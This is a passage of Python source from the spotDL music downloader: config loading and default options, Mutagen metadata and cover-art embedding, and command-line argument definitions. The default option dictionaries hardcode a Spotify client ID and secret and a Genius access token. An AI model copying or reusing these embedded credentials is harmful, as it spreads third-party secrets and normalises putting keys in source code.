get_temp_path() -> Path: """ Get the path to the temp folder. ### Returns - The path to the temp folder. """ temp_path = get_spotdl_path() / "temp" if not temp_path.exists(): os.mkdir(temp_path) return temp_path def get_errors_path() -> Path: """ Get the path to the errors folder. ### Returns - The path to the errors folder. ### Notes - If the errors directory does not exist, it will be created. """ errors_path = get_spotdl_path() / "errors" if not errors_path.exists(): os.mkdir(errors_path) return errors_path def get_web_ui_path() -> Path: """ Get the path to the web-ui folder. ### Returns - The path to the web-ui folder. ### Notes - If the web-ui directory does not exist, it will be created. """ web_ui_path = get_spotdl_path() / "web-ui" if not web_ui_path.exists(): os.mkdir(web_ui_path) return web_ui_path def get_config() -> Dict[str, Any]: """ Get the config. ### Returns - The dictionary with the config. ### Errors - ConfigError: If the config file does not exist. """ config_path = get_config_file() if not config_path.exists(): raise ConfigError( "Config file not found." "Please run `spotdl --generate-config` to create a config file." ) with open(config_path, "r", encoding="utf-8") as config_file: return json.load(config_file) def create_settings_type( arguments: Namespace, config: Dict[str, Any], default: Union[SpotifyOptions, DownloaderOptions, WebOptions], ) -> Dict[str, Any]: """ Create settings dict Argument value has always the priority, then the config file value, and if neither are set, use default value ### Arguments - arguments: Namespace from argparse - default: dict ### Returns - settings: dict """ settings = {} for key, default_value in default.items(): argument_val = arguments.__dict__.get(key) config_val = config.get(key) if argument_val is not None: settings[key] = argument_val elif config_val is not None: settings[key] = config_val else: settings[key] = default_value return settings def create_settings( arguments: Namespace, ) -> Tuple[SpotifyOptions, DownloaderOptions, WebOptions]: """ Create settings dicts for Spotify, Downloader and Web based on the arguments and config file (if enabled) ### Arguments - arguments: Namespace from argparse ### Returns - spotify_options: SpotifyOptions - downloader_options: DownloaderOptions - web_options: WebOptions """ # Get the config file # It will automatically load if the `load_config` is set to True # in the config file config = {} if arguments.config or ( get_config_file().exists() and get_config().get("load_config") ): config = get_config() # Type: ignore because of the issues below # https://github.com/python/mypy/issues/8890 # https://github.com/python/mypy/issues/5382 spotify_options = SpotifyOptions( **create_settings_type(arguments, config, SPOTIFY_OPTIONS) # type: ignore ) downloader_options = DownloaderOptions( **create_settings_type(arguments, config, DOWNLOADER_OPTIONS) # type: ignore ) web_options = WebOptions(**create_settings_type(arguments, config, WEB_OPTIONS)) # type: ignore return spotify_options, downloader_options, web_options def modernize_settings(options: DownloaderOptions): """Handle deprecated values in config file. ### Arguments - options: DownloaderOptions to modernize """ warning_msg = "Deprecated '%s' value found for '%s' setting in config file. Using '%s' instead." # Respect backward compatibility with old boolean --restrict flag if options["restrict"] is True: logger.warning(warning_msg, True, "restrict", "strict") options["restrict"] = "strict" class GlobalConfig: """ Class to store global configuration """ parameters: Dict[str, Any] = {} @classmethod def set_parameter(cls, key, value): """ Set a parameter for the download config """ cls.parameters[key] = value @classmethod def get_parameter(cls, key): """ Get a parameter from the download config """ return cls.parameters.get(key, None) SPOTIFY_OPTIONS: SpotifyOptions = { "client_id": "5f573c9620494bae87890c0f08a60293", "client_secret": "212476d9b0f3472eaa762d90b19b0ba8", "auth_token": None, "user_auth": False, "headless": False, "cache_path": str(get_cache_path()), "no_cache": False, "max_retries": 3, "use_cache_file": False, } DOWNLOADER_OPTIONS: DownloaderOptions = { "audio_providers": ["youtube-music"], "lyrics_providers": ["genius", "azlyrics", "musixmatch"], "genius_token": "alXXDbPZtK1m2RrZ8I4k2Hn8Ahsd0Gh_o076HYvcdlBvmc0ULL1H8Z8xRlew5qaG", "playlist_numbering": False, "scan_for_songs": False, "m3u": None, "output": "{artists} - {title}.{output-ext}", "overwrite": "skip", "search_query": None, "ffmpeg": "ffmpeg", "bitrate": None, "ffmpeg_args": None, "format": "mp3", "save_file": None, "filter_results": True, "album_type": None, "threads": 4, "cookie_file": None, "restrict": None, "print_errors": False, "sponsor_block": False, "preload": False, "archive": None, "load_config": True, "log_level": "INFO", "simple_tui": False, "fetch_albums": False, "id3_separator": "/", "ytm_data": False, "add_unavailable": False, "generate_lrc": False, "force_update_metadata": False, "only_verified_results": False, "sync_without_deleting": False, "max_filename_length": None, "yt_dlp_args": None, "detect_formats": None, "save_errors": None, "ignore_albums": None, "proxy": None, "skip_explicit": False, "log_format": None, "redownload": False, "skip_album_art": False, "create_skip_file": False, "respect_skip_file": False, "sync_remove_lrc": False, } WEB_OPTIONS: WebOptions = { "web_use_output_dir": False, "port": 8800, "host": "localhost", "keep_alive": False, "enable_tls": False, "key_file": None, "cert_file": None, "ca_file": None, "allowed_origins": None, "keep_sessions": False, "force_update_gui": False, "web_gui_repo": None, "web_gui_location": None, } # Type: ignore because of the issues above DEFAULT_CONFIG: SpotDLOptions = { **SPOTIFY_OPTIONS, # type: ignore **DOWNLOADER_OPTIONS, # type: ignore **WEB_OPTIONS, # type: ignore } File: spotdl/utils/metadata.py """ Module for embedding metadata into audio files using Mutagen. ```python embed_metadata( output_file=Path("test.mp3"), song=song_object, file_format="mp3", ) ``` """ import base64 import logging import re from pathlib import Path from typing import Any, Dict, Optional import requests from mutagen._file import File from mutagen.flac import Picture from mutagen.id3 import ID3 from mutagen.id3._frames import ( APIC, COMM, POPM, SYLT, TALB, TCOM, TCON, TCOP, TDRC, TIT2, TPE1, TRCK, TSRC, TYER, USLT, WOAS, ) from mutagen.id3._specs import Encoding from mutagen.mp4 import MP4Cover from mutagen.wave import WAVE from spotdl.types.song import Song from spotdl.utils.config import GlobalConfig from spotdl.utils.formatter import to_ms from spotdl.utils.lrc import remomve_lrc logger = logging.getLogger(__name__) __all__ = [ "MetadataError", "M4A_TAG_PRESET", "MP3_TAG_PRESET", "TAG_PRESET", "TAG_TO_SONG", "M4A_TO_SONG", "MP3_TO_SONG", "LRC_REGEX", "embed_metadata", "embed_cover", "embed_lyrics", "get_file_metadata", ] class MetadataError(Exception): """ Base class for all exceptions related to metadata and id3 embedding. """ # Apple has specific tags - see mutagen docs - # http://mutagen.readthedocs.io/en/latest/api/mp4.html M4A_TAG_PRESET = { "album": "\xa9alb", "artist": "\xa9ART", "date": "\xa9day", "title": "\xa9nam", "year": "\xa9day", "comment": "\xa9cmt", "group": "\xa9grp", "writer": "\xa9wrt", "genre": "\xa9gen", "tracknumber": "trkn", "trackcount": "trkn", "albumartist": "aART", "discnumber": "disk", "disccount": "disk", "cpil": "cpil", "albumart": "covr", "encodedby": "\xa9too", "copyright": "cprt", "tempo": "tmpo", "lyrics": "\xa9lyr", "explicit": "rtng", "woas": "----:spotdl:WOAS", "isrc": "----:spotdl:ISRC", } MP3_TAG_PRESET = { "album": "TALB", "artist": "TPE1", "date": "TDRC", "title": "TIT2", "year": "TDRC", "comment": "COMM::XXX", "group": "TIT1", "writer": "TEXT", "genre": "TCON", "tracknumber": "TRCK", "trackcount": "TRCK", "albumartist": "TPE2", "discnumber": "TPOS", "disccount": "TPOS", "cpil": "TCMP", "albumart": "APIC", "encodedby": "TENC", "copyright": "TCOP", "tempo": "TBPM", "lyrics": "USLT::XXX", "woas": "WOAS", "isrc": "TSRC", "explicit": "NULL", } TAG_PRESET = {key: key for key in M4A_TAG_PRESET} TAG_TO_SONG = { "title": "name", "artist": "artists", "album": "album_name", "albumartist": "album_artist", "genre": "genres", "discnumber": "disc_number", "year": "year", "date": "date", "tracknumber": "track_number", "encodedby": "publisher", "woas": "url", "comment": "download_url", "isrc": "isrc", "copyright": "copyright_text", "lyrics": "lyrics", "albumart": "album_art", } M4A_TO_SONG = { value: TAG_TO_SONG.get(key) for key, value in M4A_TAG_PRESET.items() if TAG_TO_SONG.get(key) } MP3_TO_SONG = { value: TAG_TO_SONG.get(key) for key, value in MP3_TAG_PRESET.items() if TAG_TO_SONG.get(key) } LRC_REGEX = re.compile(r"(\[\d{2}:\d{2}.\d{2,3}\])") def embed_metadata( output_file: Path, song: Song, id3_separator: str = "/", skip_album_art: Optional[bool] = False, ): """ Set ID3 tags for generic files (FLAC, OPUS, OGG) ### Arguments - output_file: Path to the output file. - song: Song object. - id3_separator: The separator used for the id3 tags. - skip_album_art: Boolean to skip album art embedding. """ # Get the file extension for the output file encoding = output_file.suffix[1:] if encoding == "wav": embed_wav_file(output_file, song) return # Get the tag preset for the file extension tag_preset = TAG_PRESET if encoding != "m4a" else M4A_TAG_PRESET try: audio_file = File(str(output_file.resolve()), easy=encoding == "mp3") if audio_file is None: raise MetadataError( f"Unrecognized file format for {output_file} from {song.url}" ) except Exception as exc: raise MetadataError("Unable to load file.") from exc # Embed basic metadata audio_file[tag_preset["artist"]] = song.artists audio_file[tag_preset["albumartist"]] = ( song.album_artist if song.album_artist else song.artist ) audio_file[tag_preset["title"]] = song.name audio_file[tag_preset["date"]] = song.date audio_file[tag_preset["encodedby"]] = song.publisher # Embed metadata that isn't always present album_name = song.album_name if album_name: audio_file[tag_preset["album"]] = album_name if song.genres: audio_file[tag_preset["genre"]] = song.genres[0].title() if song.copyright_text: audio_file[tag_preset["copyright"]] = song.copyright_text if song.download_url and encoding != "mp3": audio_file[tag_preset["comment"]] = song.download_url # Embed some metadata in format specific ways if encoding in ["flac", "ogg", "opus"]: audio_file["discnumber"] = str(song.disc_number) audio_file["disctotal"] = str(song.disc_count) audio_file["tracktotal"] = str(song.tracks_count) audio_file["tracknumber"] = str(song.track_number) audio_file["woas"] = song.url audio_file["isrc"] = song.isrc elif encoding == "m4a": audio_file[tag_preset["discnumber"]] = [(song.disc_number, song.disc_count)] audio_file[tag_preset["tracknumber"]] = [(song.track_number, song.tracks_count)] audio_file[tag_preset["explicit"]] = (4 if song.explicit is True else 2,) audio_file[tag_preset["woas"]] = song.url.encode("utf-8") elif encoding == "mp3": audio_file["tracknumber"] = f"{str(song.track_number)}/{str(song.tracks_count)}" audio_file["discnumber"] = f"{str(song.disc_number)}/{str(song.disc_count)}" audio_file["isrc"] = song.isrc # Mp3 specific encoding if encoding == "mp3": if id3_separator != "/": audio_file.save(v23_sep=id3_separator, v2_version=3) else: audio_file.save(v2_version=3) audio_file = ID3(str(output_file.resolve())) audio_file.add(WOAS(encoding=3, url=song.url)) if song.download_url: audio_file.add(COMM(encoding=3, text=song.download_url)) if song.popularity: audio_file.add( POPM( rating=int(song.popularity * 255 / 100), ) ) if song.year: audio_file.add(TYER(encoding=3, text=str(song.year))) if not skip_album_art: # Embed album art audio_file = embed_cover(audio_file, song, encoding) # Embed lyrics audio_file = embed_lyrics(audio_file, song, encoding) # Mp3 specific encoding if encoding == "mp3": audio_file.save(v23_sep=id3_separator, v2_version=3) else: audio_file.save() def embed_cover(audio_file, song: Song, encoding: str): """ Embed the album art in the audio file. ### Arguments - audio_file: Audio file object. - song: Song object. """ if not song.cover_url: return audio_file # Try to download the cover art try: cover_data = requests.get( song.cover_url, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ).content except Exception: return audio_file # Create the image object for the file type if encoding in ["flac", "ogg", "opus"]: picture = Picture() picture.type = 3 picture.desc = "Cover" picture.mime = "image/jpeg" picture.data = cover_data if encoding in ["ogg", "opus"]: image_data = picture.write() encoded_data = base64.b64encode(image_data) vcomment_value = encoded_data.decode("ascii") if "metadata_block_picture" in audio_file.keys(): audio_file.pop("metadata_block_picture") audio_file["metadata_block_picture"] = [vcomment_value] elif encoding == "flac": if audio_file.pictures: audio_file.clear_pictures() audio_file.add_picture(picture) elif encoding == "m4a": if M4A_TAG_PRESET["albumart"] in audio_file.keys(): audio_file.pop(M4A_TAG_PRESET["albumart"]) audio_file[M4A_TAG_PRESET["albumart"]] = [ MP4Cover( cover_data, imageformat=MP4Cover.FORMAT_JPEG, ) ] elif encoding == "mp3": if "APIC:Cover" in audio_file.keys(): audio_file.pop("APIC:Cover") audio_file["APIC"] = APIC( encoding=3, mime="image/jpeg", type=3, desc="Cover", data=cover_data, ) return audio_file def embed_lyrics(audio_file, song: Song, encoding: str): """ Detect lyrics type (lrc or txt) and embed them in the audio file. ### Arguments - audio_file: Audio file object. - song: Song object. - encoding: Encoding type. """ lyrics = song.lyrics if not lyrics: return audio_file tag_preset = TAG_PRESET if encoding != "m4a" else M4A_TAG_PRESET # Check if the lyrics are in lrc format # using regex on the first 5 lines lrc_lines = lyrics.splitlines()[:5] lrc_lines = [line for line in lrc_lines if line and LRC_REGEX.match(line)] if len(lrc_lines) == 0: # Lyrics are not in lrc format # Embed them normally if encoding == "mp3": audio_file.add(USLT(encoding=Encoding.UTF8, text=song.lyrics)) else: audio_file[tag_preset["lyrics"]] = song.lyrics else: # Lyrics are in lrc format # Embed them as SYLT id3 tag clean_lyrics = remomve_lrc(lyrics) if encoding == "mp3": lrc_data = [] for line in lyrics.splitlines(): time_tag = line.split("]", 1)[0] + "]" text = line.replace(time_tag, "") time_tag = time_tag.replace("[", "") time_tag = time_tag.replace("]", "") time_tag = time_tag.replace(".", ":") time_tag_vals = time_tag.split(":") if len(time_tag_vals) != 3 or any( not isinstance(tag, int) for tag in time_tag_vals ): continue minute, sec, millisecond = time_tag_vals time = to_ms(min=minute, sec=sec, ms=millisecond) lrc_data.append((text, time)) audio_file.add(USLT(encoding=3, text=clean_lyrics)) audio_file.add(SYLT(encoding=3, text=lrc_data, format=2, type=1)) else: audio_file[tag_preset["lyrics"]] = song.lyrics return audio_file def get_file_metadata(path: Path, id3_separator: str = "/") -> Optional[Dict[str, Any]]: """ Get song metadata. ### Arguments - path: Path to the song. ### Returns - Dict of song metadata. ### Raises - OSError: If the file is not found. - MetadataError: If the file is not a valid audio file. """ if path.exists() is False: raise OSError(f"File not found: {path}") audio_file = File(str(path.resolve())) if audio_file is None or audio_file == {}: return None song_meta: Dict[str, Any] = {} for key in TAG_PRESET: if path.suffix == ".m4a": val = audio_file.get(M4A_TAG_PRESET[key]) elif path.suffix == ".mp3": val = audio_file.get(MP3_TAG_PRESET[key]) else: val = audio_file.get(key) # Cover art is a special case and # has to be handled before checking the val # M4A is handled in the m4a section since it # has data in the val variable if key == "albumart": if path.suffix == ".mp3": cover = audio_file.get("APIC:Cover") if cover: song_meta["album_art"] = cover.data else: song_meta["album_art"] = None continue if path.suffix == ".flac": song_meta["album_art"] = audio_file.pictures[0].data continue if path.suffix in [".ogg", ".opus"]: pictures = audio_file.get("metadata_block_picture") if pictures and pictures[0]: song_meta["album_art"] = pictures[0] else: song_meta["album_art"] = None continue # If the tag is empty, skip it if val is None: # If the tag is empty but it's key is in the # song object, set it to None empty_key = TAG_TO_SONG.get(key) if empty_key: song_meta[empty_key] = None continue # MP3 specific decoding if path.suffix == ".mp3": if key == "woas": song_meta["url"] = val.url elif key == "comment": song_meta["download_url"] = val.text[0] elif key == "year": song_meta["year"] = int(str(val.text[0])[:4]) elif key == "date": song_meta["date"] = str(val.text[0]) elif key in ["tracknumber", "trackcount"]: count = val.text[0].split(id3_separator) if len(count) == 2: song_meta["track_number"] = int(count[0]) song_meta["tracks_count"] = int(count[1]) else: song_meta["track_number"] = val.text[0] elif key in ["discnumber", "disccount"]: count = val.text[0].split(id3_separator) if len(count) == 2: song_meta["disc_number"] = int(count[0]) song_meta["disc_count"] = int(count[1]) else: song_meta["disc_number"] = val.text[0] elif key == "artist": artists_val: str = ( val.text[0] if isinstance(val.text, list) else val.text ) song_meta["artists"] = artists_val.split(id3_separator) else: meta_key = TAG_TO_SONG.get(key) if meta_key and song_meta.get(meta_key) is None: song_meta[meta_key] = ( val.text[0] if isinstance(val.text, list) and len(val.text) == 1 else val.text ) # M4A specific decoding elif path.suffix == ".m4a": if key == "artist": song_meta["artists"] = val elif key == "woas": song_meta["url"] = val[0].decode("utf-8") elif key == "explicit": song_meta["explicit"] = val == [4] if val else None elif key == "year": song_meta["year"] = int(str(val[0])[:4]) elif key == "discnumber": song_meta["disc_number"] = val[0][0] song_meta["disc_count"] = val[0][1] elif key == "tracknumber": song_meta["track_number"] = val[0][0] song_meta["tracks_count"] = val[0][1] else: meta_key = TAG_TO_SONG.get(key) if meta_key: song_meta[meta_key] = ( val[0] if isinstance(val, list) and len(val) == 1 else val ) # FLAC, OGG, OPUS specific decoding else: if key == "artist": song_meta["artists"] = val elif key == "tracknumber": song_meta["track_number"] = int(val[0]) elif key == "discnumber": song_meta["disc_count"] = int(val[0]) song_meta["disc_number"] = int(val[0]) else: meta_key = TAG_TO_SONG.get(key) if meta_key: song_meta[meta_key] = ( val[0] if isinstance(val, list) and len(val) == 1 else val ) # Make sure that artists is a list if isinstance(song_meta["artists"], str): song_meta["artists"] = [song_meta["artists"]] elif song_meta["artists"] is not None: song_meta["artists"] = list(song_meta["artists"]) else: song_meta["artists"] = [] # Make sure that genres is a list if isinstance(song_meta["genres"], str): song_meta["genres"] = [song_meta["genres"]] # Add main artist to the song meta object if song_meta["artists"]: song_meta["artist"] = song_meta["artists"][0] else: song_meta["artist"] = None return song_meta def embed_wav_file(output_file: Path, song: Song): """ Embeds the song metadata into the wav file ### Arguments - output_file: The output file path - song: The song object - id3_separator: The separator used for the id3 tags """ audio = WAVE(output_file) if audio is None: raise ValueError("Invalid audio file") if audio.tags: audio.tags.clear() audio.add_tags() audio.tags.add(TIT2(encoding=3, text=song.name)) # type: ignore audio.tags.add(TPE1(encoding=3, text=song.artists)) # type: ignore audio.tags.add(TALB(encoding=3, text=song.album_name)) # type: ignore audio.tags.add(TCOM(encoding=3, text=song.publisher)) # type: ignore audio.tags.add(TCON(encoding=3, text=song.genres)) # type: ignore audio.tags.add(TDRC(encoding=3, text=song.date)) # type: ignore audio.tags.add( # type: ignore TRCK(encoding=3, text=f"{song.track_number}/{song.tracks_count}") # type: ignore ) audio.tags.add(TDRC(encoding=3, text=song.date)) # type: ignore audio.tags.add(WOAS(encoding=3, text=song.url)) # type: ignore audio.tags.add(TSRC(encoding=3, text=song.isrc)) # type: ignore if song.download_url: audio.tags.add(COMM(encoding=3, text=song.download_url)) # type: ignore if song.copyright_text: audio.tags.add(TCOP(encoding=3, text=song.copyright_text)) # type: ignore if song.popularity: audio.tags.add( # type: ignore COMM( encoding=3, lang="eng", text="Spotify Popularity: " + str(song.popularity), ) ) if song.cover_url: try: cover_data = requests.get(song.cover_url, timeout=10).content audio.tags.add( # type: ignore APIC( encoding=3, mime="image/jpeg", type=3, desc="Cover", data=cover_data ) ) except Exception: pass if song.lyrics: # Check if the lyrics are in lrc format # using regex on the first 5 lines lrc_lines = song.lyrics.splitlines()[:5] lrc_lines = [line for line in lrc_lines if line and LRC_REGEX.match(line)] if len(lrc_lines) == 0: audio.tags.add(USLT(encoding=Encoding.UTF8, text=song.lyrics)) # type: ignore else: lrc_data = [] clean_lyrics = remomve_lrc(song.lyrics) for line in song.lyrics.splitlines(): time_tag = line.split("]", 1)[0] + "]" text = line.replace(time_tag, "") time_tag = time_tag.replace("[", "") time_tag = time_tag.replace("]", "") time_tag = time_tag.replace(".", ":") time_tag_vals = time_tag.split(":") if len(time_tag_vals) != 3 or any( not isinstance(tag, int) for tag in time_tag_vals ): continue minute, sec, millisecond = time_tag_vals time = to_ms(min=minute, sec=sec, ms=millisecond) lrc_data.append((text, time)) audio.tags.add(USLT(encoding=3, text=clean_lyrics)) # type: ignore audio.tags.add(SYLT(encoding=3, text=lrc_data, format=2, type=1)) # type: ignore audio.save() File: spotdl/utils/downloader.py """ Module for functions related to downloading songs. """ from spotdl.providers.audio import YouTubeMusic __all__ = ["check_ytmusic_connection"] def check_ytmusic_connection() -> bool: """ Check if we can connect to YouTube Music API ### Returns - `True` if we can connect to YouTube Music API - `False` if we can't connect to YouTube Music API """ # Check if we are getting results from YouTube Music ytm = YouTubeMusic() test_results = ytm.get_results("a") if len(test_results) == 0: return False return True File: spotdl/utils/arguments.py """ Module that handles the command line arguments. """ import argparse import sys import textwrap from argparse import ArgumentParser, Namespace, _ArgumentGroup from typing import List from spotdl import _version from spotdl.download.downloader import AUDIO_PROVIDERS, LYRICS_PROVIDERS from spotdl.utils.ffmpeg import FFMPEG_FORMATS from spotdl.utils.formatter import VARS from spotdl.utils.logging import NAME_TO_LEVEL __all__ = ["OPERATIONS", "SmartFormatter", "parse_arguments"] OPERATIONS = ["download", "save", "web", "sync", "meta", "url"] class SmartFormatter(argparse.HelpFormatter): """ Class that overrides the default help formatter. """ def _split_lines(self, text: str, width: int) -> List[str]: """ Split the text in multiple lines if a line starts with a N| """ if text.startswith("N|"): return text[2:].splitlines() text = self._whitespace_matcher.sub(" ", text).strip() return textwrap.wrap(text, width) def parse_main_options(parser: _ArgumentGroup): """ Parse main options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add operation argument operation = parser.add_argument( "operation", choices=OPERATIONS, default="download", const="download", nargs="?", help=( "N|The operation to perform.\n" "download: Download the songs to the disk and embed metadata.\n" "save: Saves the songs metadata to a file for further use.\n" "web: Starts a web interface to simplify the download process.\n" "sync: Removes songs that are no longer present, downloads new ones\n" "meta: Update your audio files with metadata\n" "url: Get the download URL for songs\n\n" ), ) # Add query argument query = parser.add_argument( "query", nargs="+", type=str, help=( "N|Spotify/YouTube URL for a song/playlist/album/artist/etc. to download.\n\n" "For album/playlist/artist searching, include 'album:', 'playlist:', 'artist:' \n" "(ie. 'album:the album name' you can mix these options to get more accurate results)" ".\n\n" "To download liked songs use 'saved' as the query, to download all user playlists\n" "use 'all-user-playlists, to download playlists that the user has created\n" "use 'all-saved-playlists', to download all user liked playlists\n" "use 'all-user-followed-artists', to download all user saved albums " "use 'all-user-saved-albums' \n\n" "For manual audio matching, you can use the format 'YouTubeURL|SpotifyURL'\n" "You can only use album/playlist/tracks urls when " "downloading/matching youtube urls.\n" "When using youtube url without spotify url, " "you won't be able to use `--fetch-albums` option.\n\n" ), ) try: is_web = sys.argv[1] == "web" except IndexError: is_web = False is_frozen = getattr(sys, "frozen", False) # If the program is frozen, we and user didn't pass any arguments, # or if the user is using the web interface, we don't need to parse # the query if (is_frozen and len(sys.argv) < 2) or (len(sys.argv) > 1 and is_web): # If we are running the web interface # or we are in the frozen env and not running web interface # don't remove the operation from the arg parser if not is_web or (is_frozen and not is_web): parser._remove_action(operation) # pylint: disable=protected-access parser._remove_action(query) # pylint: disable=protected-access # Audio provider argument parser.add_argument( "--audio", dest="audio_providers", nargs="*", choices=AUDIO_PROVIDERS, help="The audio provider to use. You can provide more than one for fallback.", ) # Lyrics provider argument parser.add_argument( "--lyrics", dest="lyrics_providers", nargs="*", choices=LYRICS_PROVIDERS.keys(), help=( "The lyrics provider to use. You can provide more than one for fallback. " "Synced lyrics might not work correctly with some music players. " "For such cases it's better to use `--generate-lrc` option." ), ) parser.add_argument( "--genius-access-token", dest="genius_token", help="Lets you choose your own Genius access token.", ) # Add config argument parser.add_argument( "--config", action="store_true", help=( "Use the config file to download songs. " "It's located under C:\\Users\\user\\.spotdl\\config.json " "or ~/.spotdl/config.json under linux" ), ) # Add search query argument parser.add_argument( "--search-query", help=f"The search query to use, available variables: {', '.join(VARS)}", type=str, ) # Add don't filter results argument parser.add_argument( "--dont-filter-results", dest="filter_results", action="store_const", const=False, help="Disable filtering results.", ) # Add use only verified results argument parser.add_argument( "--album-type", choices={"album", "single"}, help="Type of the album to search for. (album, single)", type=str, ) # Add use only verified results argument parser.add_argument( "--only-verified-results", action="store_const", const=True, help="Use only verified results. (Not all providers support this)", ) def parse_spotify_options(parser: _ArgumentGroup): """ Parse spotify options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add login argument parser.add_argument( "--user-auth", action="store_const", const=True, help="Login to Spotify using OAuth.", ) # Add client id argument parser.add_argument( "--client-id", help="The client id to use when logging in to Spotify.", type=str, ) # Add client secret argument parser.add_argument( "--client-secret", help="The client secret to use when logging in to Spotify.", type=str, ) # Add auth token argument parser.add_argument( "--auth-token", help="The authorization token to use directly to log in to Spotify.", type=str, ) # Add cache path argument parser.add_argument( "--cache-path", type=str, help="The path where spotipy cache file will be stored.", ) # Add no cache argument parser.add_argument( "--no-cache", action="store_const", const=True, help="Disable caching (both requests and token).", ) # Add max retries argument parser.add_argument( "--max-retries", type=int, help="The maximum number of retries to perform when getting metadata.", ) # Add headless argument parser.add_argument( "--headless", action="store_const", const=True, help="Run in headless mode.", ) # Add use cache file argument parser.add_argument( "--use-cache-file", action="store_const", const=True, help=( "Use the cache file to get metadata. " "It's located under C:\\Users\\user\\.spotdl\\.spotify_cache " "or ~/.spotdl/.spotify_cache under linux. " "It only caches tracks and " "gets updated whenever spotDL gets metadata from Spotify. " "(It may provide outdated metadata use with caution)" ), ) def parse_ffmpeg_options(parser: _ArgumentGroup): """ Parse ffmpeg options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add ffmpeg executable argument parser.add_argument( "--ffmpeg", help="The ffmpeg executable to use.", type=str, ) # Add search threads argument parser.add_argument( "--threads", type=int, help="The number of threads to use when downloading songs.", ) # Add constant bit rate argument parser.add_argument( "--bitrate", choices=[ "auto", "disable", "8k", "16k", "24k", "32k", "40k", "48k", "64k", "80k", "96k", "112k", "128k", "160k", "192k", "224k", "256k", "320k", ] + list(map(str, range(0, 10))), type=str.lower, help=( "The constant/variable bitrate to use for the output file. " "Values from 0 to 9 are variable bitrates. " "Auto will use the bitrate of the original file. " "Disable will disable the bitrate option. " "(In case of m4a and opus files, auto and disable will skip the conversion)" ), ) # Additional ffmpeg arguments parser.add_argument( "--ffmpeg-args", type=str, help="Additional ffmpeg arguments passed as a string.", ) def parse_output_options(parser: _ArgumentGroup): """ Parse output options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add output format argument parser.add_argument( "--format", choices=FFMPEG_FORMATS.keys(), help="The format to download the song in.", type=str, ) # Add save file argument parser.add_argument( "--save-file", type=str, help=( "The file to save/load the songs data from/to. " "It has to end with .spotdl. " "If combined with the download operation, it will save the songs data to the file. " "Required for save/sync (use - to print to stdout when using save). " ), required=len(sys.argv) > 1 and sys.argv[1] in ["save"], ) # Add preload argument parser.add_argument( "--preload", action="store_const", const=True, help="Preload the download url to speed up the download process.", ) # Add name format argument parser.add_argument( "--output", type=str, help=f"Specify the downloaded file name format, available variables: {', '.join(VARS)}", ) # Add m3u argument parser.add_argument( "--m3u", type=str, nargs="?", help=( "Name of the m3u file to save the songs to. " "Defaults to {list[0]}.m3u8 " "If you want to generate a m3u for each list in the query use {list}, " "If you want to generate a m3u file based on the first list in the query use {list[0]}" ", (0 is the first list in the query, 1 is the second, etc. " "songs don't count towards the list number) " ), const="{list[0]}.m3u8", ) # Add cookie file argument parser.add_argument( "--cookie-file", help="Path to cookies file.", type=str, ) # Add overwrite argument parser.add_argument( "--overwrite", choices={"force", "skip", "metadata"}, help=( "How to handle existing/duplicate files. " "(When combined with --scan-for-songs force will remove " "all duplicates, and metadata will only apply metadata to the " "latest song and will remove the rest. )" ), type=str, ) # Option to increase compatibility of filenames and easier handling in the shell parser.add_argument( "--restrict", choices={"strict", "ascii", "none"}, const="strict", nargs="?", help="Restrict filenames to a sanitized set of characters for better compatibility", type=str, ) # Option to print errors on exit, useful for long playlist parser.add_argument( "--print-errors", action="store_const", const=True, help="Print errors (wrong songs, failed downloads etc) on exit, useful for long playlist", ) # Option to save errors to a file parser.add_argument( "--save-errors", type=str, help="Save errors (wrong songs, failed downloads etc) to a file", ) # Option to use sponsor block parser.add_argument( "--sponsor-block", action="store_const", const=True, help="Use the sponsor block to download songs from yt/ytm.", ) # Add archive_file argument parser.add_argument( "--archive", type=str, help="Specify the file name for an archive of already downloaded songs", ) # Option to set the track number & album of tracks in a playlist to their index in the playlist # & the name of playlist respectively. parser.add_argument( "--playlist-numbering", action="store_const", dest="playlist_numbering", const=True, help="Sets each track in a playlist to have the playlist's name as its album,\ and album art as the playlist's icon", ) # Option to scan the output directory for existing files parser.add_argument( "--scan-for-songs", action="store_const", const=True, help=( "Scan the output directory for existing files. " "This option should be combined with the --overwrite option " "to control how existing files are handled. (Output directory is the last directory " "that is not a template variable in the output template)" ), ) # Option to fetch all albums from songs in query parser.add_argument( "--fetch-albums", action="store_const", const=True, help="Fetch all albums from songs in query", ) # Option to change the id3 separator parser.add_argument( "--id3-separator", type=str, help="Change the separator used in the id3 tags. Only supported for mp3 files.", ) # Option to use ytm data instead of spotify data # when downloading using ytm link parser.add_argument( "--ytm-data", action="store_const", const=True, help="Use ytm data instead of spotify data when downloading using ytm link.", ) # Option whether to add unavailable songs to the m3u file parser.add_argument( "--add-unavailable", action="store_const", const=True, help="Add unavailable songs to the m3u/archive files when downloading", ) # Generate lrc files parser.add_argument( "--generate-lrc", action="store_const", const=True, help=( "Generate lrc files for downloaded songs. " "Requires `synced` provider to be present in the lyrics providers list." ), ) # Force update metadata parser.add_argument( "--force-update-metadata", action="store_const", const=True, help="Force update metadata for songs that already have metadata.", ) # Sync without deleting parser.add_argument( "--sync-without-deleting", action="store_const", const=True, help="Sync without deleting songs that are not in the query.", ) # Max file name length parser.add_argument( "--max-filename-length", type=int, help=( "Max file name length. " "(This won't override the max file name length enforced by the OS)" ), ) # YT-DlP options parser.add_argument( "--yt-dlp-args", type=str, help="Arguments to pass to yt-dlp", ) # Detect formats option parser.add_argument( "--detect-formats", type=str, nargs="*", help=( "Detect already downloaded songs with file format different from the --format option " "(When combined with --m3u option, " "only first detected format will be added to m3u file)" ), choices=FFMPEG_FORMATS.keys(), ) # download song in meta operation parser.add_argument( "--redownload", action="store_const", const=True, help="to redownload the local song in diffrent format using --format for meta operation", ) # skip album art for meta operation parser.add_argument( "--skip-album-art", action="store_const", const=True, help="skip downloading album art for meta operation", ) # Ignore songs from a paticular album parser.add_argument( "--ignore-albums", type=str, nargs="*", help="ignores the song of the given albums", ) # Skip explicit songs options parser.add_argument( "--skip-explicit", action="store_const", const=True, help="Skip explicit songs" ) parser.add_argument( "--proxy", help="Http(s) proxy server for download song. Example: http://host:port", ) # Skip songs having a skip flag file parser.add_argument( "--create-skip-file", action="store_const", const=True, help="Create skip file for successfully downloaded file", ) # Skip songs having a skip flag file parser.add_argument( "--respect-skip-file", 